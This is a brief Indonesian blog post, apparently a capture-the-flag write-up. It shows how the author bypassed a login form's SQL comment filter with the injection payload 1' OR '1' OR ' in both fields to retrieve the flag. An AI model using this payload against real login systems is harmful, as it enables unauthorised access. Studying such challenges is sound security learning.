saya mencoba menggunakan Query " ' OR 1-- " ternyata -- terdeteksi sebagai Illegal characters detected. dan # juga terdeteksi jadi saya tidak bisa menggunakan komentar.
jadi saya coba tanpa komentar, Query:
Username: 1' OR '1' OR '
Password: 1' OR '1' OR '
Kalau di digabungkan seperti ini:
SELECT * FROM users WHERE username = '1' OR '1' OR '' AND password = '1' OR '1' OR ''
setelah itu submit maka flag akan muncul.
No comments:
Post a Comment